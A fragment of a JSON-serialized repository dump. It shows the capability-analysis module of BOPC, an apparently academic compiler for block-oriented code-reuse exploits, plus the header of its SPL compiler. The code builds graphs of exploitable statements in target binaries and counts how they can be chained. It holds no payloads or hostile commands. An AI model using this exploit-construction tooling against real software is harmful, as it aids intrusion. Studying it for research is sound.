However, all\n# these metrics aim to identify *upper bounds*; that is, they overestimate the set of SPL programs\n# that can truly be executed on this binary.\n# -------------------------------------------------------------------------------------------------\nfrom coreutils import *\nfrom calls     import *\nimport path as P\n\nimport networkx as nx\nimport textwrap\nimport datetime\nimport cPickle as pickle\nimport math\nimport numpy\n\n\n\n# -----------------------------------------------------------------------------\n# Capability Options\n# -----------------------------------------------------------------------------\nCAP_ALL             = 0x00FF                        # all types of statements\nCAP_REGSET          = 0x0001                        # register assignments \nCAP_REGMOD          = 0x0002                        # register modifications\nCAP_MEMRD           = 0x0004                        # memory reads\nCAP_MEMWR           = 0x0008                        # memory writes\nCAP_CALL            = 0x0010                        # system and library calls\nCAP_COND            = 0x0020                        # conditional statements\nCAP_LOAD            = 0x0100                        # load the capability graph from a file\nCAP_SAVE            = 0x0200                        # save the capability graph to a file\nCAP_NO_EDGE         = 0x0400                        # don't calculate edges in capability graph\n\n# types of analyses\nCAP_STMT_COMB_CTR   = 'STMT_COMB_CTR'               # Count combinations of statements\nCAP_STMT_MIN_DIST   = 'STMT_MIN_DIST'               # Count min distance between statements\nCAP_LOOPS           = 'LOOPS'                       # Analyze loops\n\n\n\n# -------------------------------------------------------------------------------------------------\n# capability: This class is responsible for performing several measurements in the target binary.\n#\nclass capability( object ):\n    ''' 
======================================================================================= '''\n    '''                                   INTERNAL VARIABLES                                    '''\n    ''' ======================================================================================= '''\n    __cap = nx.DiGraph()                            # the capability graph (CAP)\n    __uid = 0                                       # a unique ID\n    \n\n\n    ''' ======================================================================================= '''\n    '''                                   INTERNAL FUNCTIONS                                    '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __add(): Add a node to the capability graph.\n    #\n    # :Arg addr: Address of the basic block that contains the statement\n    # :Arg ty: Statement type: regset / regmod / memrd / memwr / call / cond\n    # :Arg reg: Register name (for regset/regmod/cond)\n    # :Arg val: Statement's value (for regset/regmod/cond)\n    # :Arg mode: Statement mode (const/deref for regset and syscall/libcall for call)\n    # :Arg isW: A flag indicating whether \"val\" points to a writable address (for regset)\n    # :Arg op: Statement operator (for regmod/cond)\n    # :Arg mem: Memory address (for memrd/memwr)\n    # :Arg name: Function name (for call)\n    # :Ret: None.\n    #\n    def __add( self, addr, ty, reg=None, val=None, mode=None, isW=None, op=None, name=None, mem=None, size=None ):\n        # NOTE: We assume that arguments are not malformed, so we don't do any checks\n        cap = {\n            'regset' : {'addr':int(addr), 'type':ty, 'reg':reg, 'val':val, '+W':isW, 'mode':mode},\n            'regmod' : {'addr':int(addr), 'type':ty, 'reg':reg, 'op':op, 'val':val},\n            'memrd'  : {'addr':int(addr), 'type':ty, 'reg':reg, 
'mem':mem, 'size':size},\n            'memwr'  : {'addr':int(addr), 'type':ty, 'mem':mem, 'val':val, 'size':size},\n            'call'   : {'addr':int(addr), 'type':ty, 'name':name, 'mode':mode},\n            'cond'   : {'addr':int(addr), 'type':ty, 'reg':reg, 'op':op, 'val':val}\n        }[ ty ]                                     # nicely \"switch\" the appropriate statement\n     \n        self.__cap.add_node(self.__uid, **cap)      # add statement to the graph\n        self.__uid += 1                             # update UID counter\n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                     CLASS INTERFACE                                     '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __init__(): Class constructor. Simply initialize private variables.\n    #\n    # :Arg cfg: Program's CFG.\n    # :Arg name: Program's filename\n    #\n    def __init__( self, cfg, name ):       \n        self.__cfg  = cfg                           # save cfg to internal variables\n        self.__name = name                          # program's filename\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # build(): Build the Capability Graph. This is a very slow process, so it's possible to save\n    #       the graph once it's generated, without having to re-calculate it the next time.\n    #       \n    # :Arg options: An integer that describes how the capability graph should be built. 
It can be\n    #       the logical OR of one or more of the following:\n    #\n    #       CAP_ALL     | Include all types of statements in the graph\n    #       CAP_REGSET  | Include register assignments in the graph\n    #       CAP_REGMOD  | Include register modifications in the graph\n    #       CAP_MEMRD   | Include memory reads in the graph\n    #       CAP_MEMWR   | Include memory writes in the graph\n    #       CAP_CALL    | Include system and library calls in the graph\n    #       CAP_COND    | Include conditional statements in the graph\n    #       CAP_LOAD    | Load the capability graph from a file\n    #       CAP_SAVE    | Save the capability graph to a file\n    #\n    # :Ret: None.\n    #\n    def build( self, options=CAP_ALL ):\n        dbg_prnt(DBG_LVL_1, \"Exploring program's capability...\")\n\n        # ---------------------------------------------------------------------\n        # Load Capability Graph from file ?\n        # ---------------------------------------------------------------------       \n        if options & CAP_LOAD:\n            dbg_prnt(DBG_LVL_1, \"Loading the Capability Graph from file...\")\n\n            try:\n                self.__cap = nx.read_gpickle(self.__name + '.cap')\n\n                dbg_prnt(DBG_LVL_1, \"Done.\")            \n\n                return                              # your job is done here\n\n            except IOError, err:\n                # if you can't load it, simply re-calculate it ;)\n\n                error(\"Cannot load Capability Graph: %s\" % str(err))\n\n\n        # ---------------------------------------------------------------------\n        # Iterate over abstracted basic blocks\n        # ---------------------------------------------------------------------       \n        dbg_prnt(DBG_LVL_1, \"Searching CFG for 'interesting' statements...\")\n\n        nnodes  = len(nx.get_node_attributes(self.__cfg.graph, 'abstr').items())\n        counter = 1\n        \n        p = P._cfg_shortest_path(self.__cfg)\n\n\n        for node, abstr in nx.get_node_attributes(self.__cfg.graph,'abstr').iteritems():\n     
       addr = node.addr\n\n            dbg_prnt(DBG_LVL_3, \"Analyzing block at 0x%x (%d/%d)...\" % (addr, counter, nnodes))\n        \n\n            if options & CAP_REGSET:\n                for reg, data in abstr['regwr'].iteritems():\n\n                    if data['type'] == 'concrete':\n                        self.__add(addr, ty='regset', reg=reg, val=data['const'], mode='const',\n                                         isW=data['writable'])\n\n                    elif data['type'] == 'deref':\n                        self.__add(addr, ty='regset', reg=reg, val=data['addr'], mode='deref')\n          \n\n            if options & CAP_REGMOD:\n                for reg, data in abstr['regwr'].iteritems():\n                    if data['type'] == 'mod':                                               \n                        self.__add(addr, ty='regmod', reg=reg, op=data['op'], val=data['const'])\n\n\n            if options & CAP_MEMRD:\n                for reg, data in abstr['regwr'].iteritems():\n                    if data['type'] == 'deref' and data['memrd']:\n                        loadreg = data['deps'][0]\n\n                        self.__add(addr, ty='memrd', reg=reg, mem=loadreg, size=data['memrd'])\n        \n            \n            if options & CAP_MEMWR:\n                for memwr in abstr['splmemwr']:\n                    self.__add(addr, ty='memwr', mem=memwr['mem'], val=memwr['val'], size=memwr['size'])\n\n\n\n            if options & CAP_CALL and abstr['call'] and find_call(abstr['call']['name']):\n                self.__add(addr, ty='call', name=abstr['call']['name'], mode=abstr['call']['type'])\n\n\n            elif options & CAP_COND and abstr['cond']:\n            \n                # elif because we can't have call and cond at the same basic block\n                self.__add(addr, ty='cond', reg=abstr['cond']['reg'], op=abstr['cond']['op'],\n                                 val=abstr['cond']['const'])\n\n\n                '''\n                # 
-----------------------------------------------------------------------\n                # hacky way to quickly find a loop\n                # -----------------------------------------------------------------------\n                for length, loop in p.k_shortest_loops(addr, 0, 10):\n                    length, loop = p.shortest_loop(addr)\n\n                    R = abstr['cond']['reg']\n\n                    regmod = 0\n                    regset = 0\n                    step = 0\n\n                    if length < INFINITY:\n\n                        for l in loop[:-1]:\n                            try:\n                                X = self.__cfg.graph.node[ADDR2NODE[l]]['abstr']\n                            except KeyError:\n                                continue\n                \n                            for reg, data in X['regwr'].iteritems():\n                                if data['type'] == 'mod' and reg == R:\n                                    regmod += 1\n                                    step = data['const']\n\n                                elif reg == R:\n                                    regset += 1\n\n\n                        if regmod == 1 and regset == 0:\n                            emph(bolds('GOOD LOOP (%d - %d - %s) %s' % \n                                    (abstr['cond']['const'], step, abstr['cond']['op'], \n                                    pretty_list(loop))))\n\n                        # else:\n                        #    print 'BAD LOOP (mod: %d, set: %d) (%d - %d - %s) %s' % \\\n                        #        (regmod, regset, abstr['cond']['const'], step, abstr['cond']['op'],\n                        #        pretty_list(loop))\n                '''\n\n            counter += 1                            # update counter\n\n        dbg_prnt(DBG_LVL_1, \"Done.\")\n\n\n        # ---------------------------------------------------------------------\n        # Show some statistics\n        # 
---------------------------------------------------------------------       \n        emph(\"Binary has %s interesting statements:\" % bold(self.__cap.order()))\n\n        stmt_ctr = { 'regset' : 0, 'regmod' : 0, 'memrd' : 0, 'memwr' : 0, 'call' : 0, 'cond' : 0 }\n        \n        for _, data in self.__cap.nodes(data=True):\n             stmt_ctr[ data['type'] ] += 1          # count statements\n\n\n        emph(\"\\t%s register assignments\"   % bold(stmt_ctr['regset'], pad=5))\n        emph(\"\\t%s register modifications\" % bold(stmt_ctr['regmod'], pad=5))\n        emph(\"\\t%s memory reads     \"      % bold(stmt_ctr['memrd'], pad=5))\n        emph(\"\\t%s memory writes    \"      % bold(stmt_ctr['memwr'], pad=5))\n        emph(\"\\t%s system/library calls\"   % bold(stmt_ctr['call'], pad=5))\n        emph(\"\\t%s conditional jumps\"      % bold(stmt_ctr['cond'], pad=5))\n\n\n        # ---------------------------------------------------------------------\n        # Add edges to the Capability Graph\n        # ---------------------------------------------------------------------\n\n        # don't calculate edges if asked (it's time consuming)\n        if options & CAP_NO_EDGE:\n            dbg_prnt(DBG_LVL_1, \"Skipping edge calculation of capability graph.\")\n            return\n\n\n        dbg_prnt(DBG_LVL_1, \"Building the Capability Graph...\")\n\n\n        # list of node addresses\n        node_list = [ d['addr'] for _, d in self.__cap.nodes_iter(data=True) ]    \n        SPT       = nx.DiGraph()                    # create the Shortest Path Tree\n        completed = 0                               # % completed\n\n        csp = P._cfg_shortest_path(self.__cfg)      # create the CFG Shortest Path object\n\n\n        warn(\"This can be a very slow process ('-dd' and '-ddd' options show a progress bar)\")\n\n        # for each node u_ in Capability Graph\n        for u_, du in self.__cap.nodes_iter(data=True):            \n            v_ = -1               
                  # v_ is the uid of the target node (u_ -> v_)            \n\n            SPT.clear()                             # clear Shortest Path Tree\n\n            # Find the shortest paths (in CFG) to every other statement. Unfortunately, shortest\n            # paths in CFG are not like regular shortest paths, as we explain in path.py. Thus we\n            # have to re-calculate all shortest paths for every node in the capability graph.\n            for length, path in csp.shortest_path(du['addr'], node_list):\n                v_ += 1                             # the uid of the current node (it's linear)\n\n                if length == INFINITY:\n                    continue                        # skip nodes with non-existing paths\n\n                # ---------------------------------------------------------------------------------\n                # Now, if we directly add the edges with shortest path lengths to the capability\n                # graph, we'll have an interesting problem: Consider the path A - x - x - B - x - C\n                # in CFG. The Capability Graph should contain the edges (A, B, 3) and (B, C, 2). \n                # However, the naive approach will also add the edge (A, C, 5) to the graph. The\n                # problem here is that we cannot accurately measure chains of statements due to\n                # these shortcut edges.\n                #\n                # To fix this issue we build the Shortest Path Tree (SPT). That is, we merge all\n                # shortest paths into a single graph. The resulting graph will be a tree, as it\n                # consists only of single-source shortest paths (without loops), with all edges\n                # having weight = 1. SPT has two types of nodes: Black and White. Black nodes \n                # contain statements (should appear on capability graph) while White nodes are used\n                # for transitions. 
The first and the last nodes of each shortest path are Black\n                # while every other node in between is White. Our goal is to remove all White nodes\n                # and merge the resulting SPT with the capability graph.\n                #\n                # We remove the White nodes one by one. When we remove a White node, we also update\n                # the weights in SPT.\n                # ---------------------------------------------------------------------------------\n               \n                # add the first and last nodes (Black) to the SPT (if a node already exists, it becomes Black)\n                SPT.add_nodes_from([path[0], path[-1]], color='Black')\n\n                # keep track of the statement uids that use this node (map address to UID)\n                SPT.node[path[0] ].setdefault('uid', set()).add(u_)\n                SPT.node[path[-1]].setdefault('uid', set()).add(v_)\n\n                # convert nodes [1,2,3,4] into edges [(1,2),(2,3),(3,4)] and add them to SPT\n                SPT.add_edges_from(zip(path, path[1:]), weight=1)\n\n                # color the intermediate nodes White (if they're not Black)\n                for p in path[1:-1]:\n                    if 'color' not in SPT.node[p] or SPT.node[p]['color'] != 'Black':\n                        SPT.node[p]['color'] = 'White'\n\n\n            # iteratively delete the White nodes\n            for n in [node for node, data in SPT.nodes(data=True) if data['color'] == 'White']:\n\n                # for each pair of (incoming, outgoing) edges\n                for src, _, d1 in SPT.in_edges(n, data=True):\n                    for _, dst, d2 in SPT.out_edges(n, data=True):\n                        # add a new edge that bypasses the White node\n                        SPT.add_edge(src, dst, weight=d1['weight']+d2['weight'])\n\n\n                SPT.remove_node(n)                  # delete White node (along with its edges)\n\n\n            ''' at this point, SPT will only contain 
Black nodes '''\n\n            # merge the SPT into the capability graph\n            for e1, e2, data in SPT.edges_iter(data=True):\n                # copy it edge-by-edge\n                for u in SPT.node[e1]['uid']:       # move from addresses back to UIDs\n                    for v in SPT.node[e2]['uid']:   \n                        if u != v:                  # avoid self-loops\n                            self.__cap.add_edge(u, v, weight=data['weight'])\n                            \n\n            # show current progress (%)\n            percent = math.floor(100. / len(self.__cap) * u_)\n            if completed < percent:\n                completed = percent            \n                dbg_prnt(DBG_LVL_2, \"%d%% completed\" % completed)\n\n        del SPT                                     # we don't need the SPT anymore\n\n        dbg_prnt(DBG_LVL_1, \"Done. Capability Graph generated successfully.\")\n      \n        visualize(self.__cap)\n\n     \n\n        # ---------------------------------------------------------------------\n        # Save Capability Graph to a file ?\n        # ---------------------------------------------------------------------       \n        if options & CAP_SAVE:\n            dbg_prnt(DBG_LVL_1, \"Saving Capability Graph...\")\n\n            try:\n                nx.write_gpickle(self.__cap, self.__name + '.cap')\n                dbg_prnt(DBG_LVL_1, \"Done. Capability Graph saved as %s\" % (self.__name + '.cap'))\n\n            except IOError, err:\n                error(\"Cannot save Capability Graph: %s\" % str(err))\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # get(): Return the Capability Graph. 
Just in case ;)\n    #\n    # :Ret: The Capability Graph\n    #\n    def get( self ):\n        return self.__cap\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # save(): Save the nodes of the Capability Graph (i.e., the interesting statements) to a file.\n    #\n    # :Ret: None.\n    #\n    def save( self ):\n        now    = datetime.datetime.now()            # get current timestamp\n        banner = textwrap.dedent(\"\"\"\\\n            #\n            # This file has been created by BOPC at %s\n            # '%s' has %d interesting statements. Each line shows a statement.\n            #\n            # The columns are: address | type | register | memory | value | mode | +W | operator | name | size\n            # When an attribute is not available, a dot '.' is printed.\n            #\n            #\n            # Attribute list:\n            #\n            #   address  : Address of the basic block that contains the statement\n            #   type     : Statement type: regset / regmod / memrd / memwr / call / cond\n            #   register : Register name (for regset / regmod / cond)\n            #   memory   : Memory address (for memrd / memwr)\n            #   value    : Statement's value (for regset / regmod / cond)\n            #   mode     : Statement mode (const / deref for regset and syscall / libcall for call)\n            #   +W       : A flag indicating whether \"val\" points to a writable address (for regset)\n            #   operator : Statement operator (for regmod / cond)\n            #   name     : Function name (for call)\n            #   size     : Access size (for memrd / memwr)\n            #\n        \"\"\" % (now.strftime(\"%d/%m/%Y %H:%M\"), self.__name, self.__cap.order()))\n\n\n        dbg_prnt(DBG_LVL_1, \"Dumping interesting statements to a file...\")    \n         \n        try:    \n            cap = open(self.__name + '.stmt', 'w')\n\n            cap.write(banner)                       # write banner first\n\n            # write statements one by one\n           
 for _, d in self.__cap.nodes_iter(data=True):                  \n                opt  = '%10s'   % (d['reg']  if 'reg'  in d else '.')\n                opt += '%10s'   % (d['mem']  if 'mem'  in d else '.')\n                opt += ' %32s ' % (d['val']  if 'val'  in d else '.')\n                opt += '%10s'   % (d['mode'] if 'mode' in d else '.')\n                opt += '%10s'   % (d['+W']   if '+W'   in d else '.')\n                opt += '%10s'   % (d['op']   if 'op'   in d else '.')\n                opt += '%16s'   % (d['name'] if 'name' in d else '.')\n                opt += '%10s'   % (d['size'] if 'size' in d else '.')\n\n                cap.write( \"0x%08x %10s %s\\n\" % (d['addr'], d['type'], opt) )\n                       \n            cap.close()\n           \n            dbg_prnt(DBG_LVL_1, \"Done. Interesting statements saved as %s\" % (self.__name + '.stmt'))\n\n        except IOError, err:\n            error(\"Cannot create statements file: %s\" % str(err))\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # explore(): Explore the Capability Graph and look for \"islands\".\n    #    \n    # :Ret: None.\n    #\n    def explore( self ):        \n        dbg_prnt(DBG_LVL_1, \"Exploring the Capability Graph...\")\n\n        self.__islands = []                         # store islands here\n        n_inslands     = 0                          # number of islands\n        size, diam     = [], []                     # size and diameter lists\n        \n\n        # ---------------------------------------------------------------------\n        # The first step is to extract the \"islands\" from the Capability Graph,\n        # which are essentially the connected components of the undirected\n        # version of the graph.\n        # ---------------------------------------------------------------------\n        capU      = self.__cap.to_undirected()      # make Capability Graph undirected\n       
 unvisited = set(capU.nodes())               # initially, no node is visited\n\n        while len(unvisited):                       # while there are unvisited nodes\n            root = unvisited.pop()                  # pick a random node\n            unvisited.add( root )                   # and put it back (the DFS below removes it)\n            \n            nodeset = []                            # nodes in the current island\n\n            # explore the island using DFS and obtain the node set\n            for u in nx.dfs_preorder_nodes(capU, root):            \n                unvisited.remove(u)                 # mark u as visited\n                nodeset.append(u)                   # and add it to node set\n\n                self.__cap.node[ u ]['island'] = n_inslands\n            \n\n            # get island as induced (directed) subgraph and relabel nodes in [0, order(G)-1] range\n            graph   = self.__cap.subgraph(nodeset)    \n            relabel = dict(zip(graph.nodes(), range(graph.order())))\n            graph   = nx.relabel_nodes(graph, relabel)\n            \n\n            # ---------------------------------------------------------------------\n            # Calculate island's diameter. Although the island is connected in\n            # the undirected version, it may not be in the directed version.\n            # Thus, nx.diameter(graph) throws an exception. 
The diameter of the island\n            # is the longest shortest path between any two nodes.\n            # ---------------------------------------------------------------------\n            D = 0                                   # island's diameter\n\n            for n in graph.nodes_iter():\n                # calculate all shortest paths from the given node\n                length = nx.single_source_shortest_path_length(graph, n)\n                maxlen = max(length.values())       # get the longest shortest path\n\n                if D < maxlen: D = maxlen           # keep track of the longest among all nodes\n\n\n            size.append(len(nodeset))               # island size\n            diam.append(D)                          # island's diameter\n\n            self.__islands.append( {                # store island's information\n                'root'     : root,\n                'size'     : graph.order(),\n                'diameter' : D,\n                'graph'    : graph\n            } )\n   \n            n_inslands += 1                         # total # islands\n\n        dbg_prnt(DBG_LVL_1, \"Done.\")\n\n\n        # ---------------------------------------------------------------------\n        # Show some statistics\n        # ---------------------------------------------------------------------      \n        warn(\"'-dd' and '-ddd' options show the 'size' and 'diameter' lists\")\n\n        emph(\"Capability Graph has %s islands\" % bold(n_inslands))\n\n        emph(\"Island sizes: max = %s, min = %s, avg = %s\" % \n            (bold(max(size)), bold(min(size)), bold(1.*sum(size)/n_inslands, 'float')))\n\n        dbg_arb(DBG_LVL_2, \"Island size list\", size)\n\n        emph(\"Island diameters: max = %s, min = %s, avg = %s\" % \n            (bold(max(diam)), bold(min(diam)), bold(1.*sum(diam)/n_inslands, 'float')))\n\n        dbg_arb(DBG_LVL_2, \"Island diameter list\", diam)\n\n\n\n    # 
---------------------------------------------------------------------------------------------\n    # analyze(): Perform various analyses on the islands of the Capability Graph.\n    #\n    # :Arg analyses: The analyses to perform (can be many)\n    # :Ret: None.\n    #\n    def analyze( self, *analyses ):\n        dbg_prnt(DBG_LVL_1, \"Analyzing the Capability Graph...\")\n\n        for analysis in analyses:                   # for every different analysis\n            try:\n                # based on the analysis, select the appropriate function and invoke it\n                func = {\n                    CAP_STMT_COMB_CTR : self.__analyze_stmt_comb_ctr,\n                    CAP_STMT_MIN_DIST : self.__analyze_stmt_min_dist,\n                    CAP_LOOPS         : self.__analyze_loops\n                }[ analysis ]\n\n\n                for island in self.__islands:       # perform the analysis on every island\n                    func( island['graph'] )\n\n            except KeyError, err:\n                fatal('Unknown analysis %s' % str(err))\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # analyze_island(): Analyze a specific island.\n    #\n    # :Arg addr: An address of any node of the island\n    # :Arg analyses: The analyses to perform (can be many)\n    # :Ret: None.\n    #\n    def analyze_island( self, addr, *analyses ):\n        # ---------------------------------------------------------------------\n        # Search for the island to analyze\n        # ---------------------------------------------------------------------\n        island_id = -1\n\n        for _, d in self.__cap.nodes_iter(data=True):\n            if d['addr'] == addr:\n                island_id = d['island']\n                break\n\n        if island_id < 0:\n            fatal(\"Node '0x%x' is not contained in any island\" % addr)\n\n        dbg_prnt(DBG_LVL_1, \"Analyzing the Island %d...\" % island_id)\n\n\n        # 
---------------------------------------------------------------------\n        # Perform the analyses\n        # ---------------------------------------------------------------------\n        for analysis in analyses:                   # for every different analysis\n            try:\n                # based on the analysis, select the appropriate function and invoke it\n                func = {\n                    CAP_STMT_COMB_CTR : self.__analyze_stmt_comb_ctr,\n                    CAP_STMT_MIN_DIST : self.__analyze_stmt_min_dist,\n                    CAP_LOOPS         : self.__analyze_loops\n                }[ analysis ]\n\n                func( self.__islands[ island_id ]['graph'] )\n\n            except KeyError, err:\n                fatal('Unknown analysis %s' % str(err))\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # callback(): Invoke a callback function for every island.\n    #\n    # :Arg cbfunc: The callback function to invoke\n    # :Ret: None.\n    #\n    def callback( self, cbfunc ):\n        for island in self.__islands:\n            cbfunc( island['graph'] )\n\n    \n    # TODO: Move these to the private function section\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __analyze_stmt_comb_ctr(): Count the total number of combinations in which K SPL statements\n    #       can be chained together (repetitions of statements are allowed) on a given island.\n    #    \n    # :Arg island: The island graph to work on\n    # :Ret: None.\n    #\n    def __analyze_stmt_comb_ctr( self, island ):\n        dbg_prnt(DBG_LVL_1, \"Starting Analysis: Statement Combinations...\")\n\n\n        # TODO: Check this again. Too many combinations :\\\n        K = 20\n\n\n        # ---------------------------------------------------------------------\n        # Find the total number of paths between any 2 nodes that use exactly\n        # K edges. 
We calculate that using Dynamic Programming. Let C^k_{ij} be\n        # the total number of paths from i to j with exactly k edges. Then we\n        # have:\n        #\n        #   C^0_{ii} = 1,                     forall i in V\n        #   C^1_{ij} = 1,                     iff (i,j) in E\n        #   C^k_{ij} = SUM_x(C^{k-1}_{xj}),   for all x adjacent to i (k >= 2)\n        #\n        # We build this table in a bottom-up fashion. Space complexity is\n        # O(|V|^2 * K). We can improve it by storing only the last two levels\n        # (k and k-1).\n        # ---------------------------------------------------------------------\n        C = numpy.zeros((K, island.order(), island.order()), dtype=numpy.int64)\n        \n        for i in range(island.order()):             # initialize for K = 0\n            C[0][i][i] = 1\n        \n        for i,j, d in island.edges_iter(data=True): # initialize for K = 1\n            C[1][i][j] = 1\n        \n        for k in range(2, K):                       # main loop\n            for i in island.nodes():\n                for j in island.nodes():\n                    for x in island.neighbors(i):\n                        C[k][i][j] += C[k-1][x][j]\n\n        # ---------------------------------------------------------------------\n        for k in range(K):\n            dbg_arb(DBG_LVL_1, \"Combinations with up to %d statements:\" % k, sum(sum(C[k][:][:])))\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __analyze_stmt_min_dist(): Calculate the minimum distance between any two statements that\n    #       are connected by exactly K edges on a given island.\n    #\n    # :Arg island: The island graph to work on\n    # :Ret: None.\n    #\n    def __analyze_stmt_min_dist( self, island ):\n        '''\n        B = { }\n\n        # enumerate all simple paths from i to j \n        # WARNING: O(n!) 
complexity !!!\n        for i in island.nodes_iter():\n            for j in island.nodes_iter():\n                if i == j: continue\n\n                for x in nx.all_simple_paths(island, i, j):\n \n                    A = [island[a][b]['weight'] for a,b in zip(x, x[1:])]\n\n                    B.setdefault(len(x), []).append(sum(A))\n        '''\n\n\n        dbg_prnt(DBG_LVL_1, \"Starting Analysis: Statement Minimum Distances...\")\n\n\n        K = 20\n\n        # ---------------------------------------------------------------------\n        # Find the minimum distance between any 2 nodes that use exactly K edges.\n        # This is very similar to the algorithm in __analyze_stmt_comb_ctr(),\n        # but with different Dynamic Programming equations:\n        #\n        #   M^0_{ii} = 0,                                  forall i in V\n        #   M^1_{ij} = weight[i][j],                       iff (i,j) in E\n        #   M^k_{ij} = MIN_x(weight[i][x] + M^{k-1}_{xj}), for all x adjacent to i (k >= 2)\n        # ---------------------------------------------------------------------\n        M = numpy.full((K, island.order(), island.order()), dtype=numpy.int32, fill_value=INFINITY)\n        \n\n        for i in range(island.order()):             # initialize for K = 0\n            M[0][i][i] = 0\n        \n        for i,j, d in island.edges_iter(data=True): # initialize for K = 1\n            M[1][i][j] = d['weight']\n        \n        for k in range(2, K):                       # main loop\n            for i in island.nodes():\n                for j in island.nodes():\n                    for x in island.neighbors(i):                        \n\n                        M[k][i][j] = min(M[k][i][j], island[i][x]['weight'] + M[k-1][x][j])\n\n        # ---------------------------------------------------------------------\n        for k in range(K):\n            m = numpy.min(M[k][:][:])            \n            if m == INFINITY: 
break\n\n            dbg_prnt(DBG_LVL_1, \"Min shortest path with up to %d statements: %d\" % (k, m))\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __analyze_loops(): Analyze the loops on a given island.\n    #    \n    # :Arg island: The island graph to work on\n    # :Ret: None.\n    #\n    def __analyze_loops( self, island ):\n        warn('Loop analysis is not supported yet')\n       \n\n# -------------------------------------------------------------------------------------------------\n"
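The two dynamic programs above can be sketched in isolation: the table C counts walks with exactly k edges, and the table M tracks min-plus distances over such walks. A minimal, self-contained sketch on a toy 3-node digraph (the function names and the graph are illustrative assumptions, not BOPC code):

```python
# Sketch of the two DP tables used by the statement-combination and
# minimum-distance analyses. Illustrative only; not BOPC code.
INF = float('inf')

def count_walks_exact_k(adj, K):
    """C[k][i][j] = number of walks from i to j using exactly k edges."""
    n = len(adj)
    C = [[[1 if i == j else 0 for j in range(n)] for i in range(n)]]  # k = 0
    for _ in range(K):
        prev = C[-1]
        # C^k_{ij} = sum over x adjacent to i of C^{k-1}_{xj}
        C.append([[sum(prev[x][j] for x in range(n) if adj[i][x])
                   for j in range(n)] for i in range(n)])
    return C

def min_dist_exact_k(w, K):
    """M[k][i][j] = minimum total weight over walks with exactly k edges
    (w[i][j] = edge weight, or INF if there is no edge i -> j)."""
    n = len(w)
    M = [[[0 if i == j else INF for j in range(n)] for i in range(n)]]  # k = 0
    for _ in range(K):
        prev = M[-1]
        # M^k_{ij} = min over x of w[i][x] + M^{k-1}_{xj}
        M.append([[min(w[i][x] + prev[x][j] for x in range(n))
                   for j in range(n)] for i in range(n)])
    return M
```

This is the matrix-power view of both recurrences: C^k is the k-th power of the adjacency matrix and M^k is its k-th min-plus (tropical) power, which is why keeping only the last two levels suffices.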
  },
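The White-node elimination that the capability-graph construction above performs on the Shortest Path Tree can be sketched on a plain adjacency-dict digraph. A minimal sketch; the function name and the min() tie-break on colliding bypass edges are illustrative assumptions, not BOPC code:

```python
def eliminate_white(edges, white):
    """Remove transition ('White') nodes from a weighted digraph, bypassing
    each one with a summed-weight edge, as in the SPT step. Illustrative
    sketch; keeps the cheaper edge when a bypass edge already exists."""
    g = {}                                   # g[u][v] = weight of edge u -> v
    for u, v, w in edges:
        g.setdefault(u, {})[v] = w
        g.setdefault(v, {})
    for n in white:
        ins  = [(u, nbrs[n]) for u, nbrs in g.items() if n in nbrs]
        outs = list(g[n].items())
        for u, w1 in ins:
            for v, w2 in outs:               # bypass n: u -> n -> v becomes u -> v
                g[u][v] = min(g[u].get(v, float('inf')), w1 + w2)
        for u, _ in ins:
            del g[u][n]                      # drop edges into n
        del g[n]                             # drop n itself (and its out-edges)
    return g
```

For the comment's example path A - x - x - B - x - C (all edge weights 1), eliminating the three x nodes yields exactly the edges (A, B, 3) and (B, C, 2), with no misleading direct (A, C) shortcut.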
  {
    "path": "source/compile.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# compile.py:\n#\n# This module compiles an program written in SPL into an equivalent Intermediate Representation\n# (IR) suitable for processing by subsequent modules. Please do not confuse it with the VEX IR.\n#\n# SPL is actually a subset of C, so it has the same syntax. Comments are denoted with '//'. 
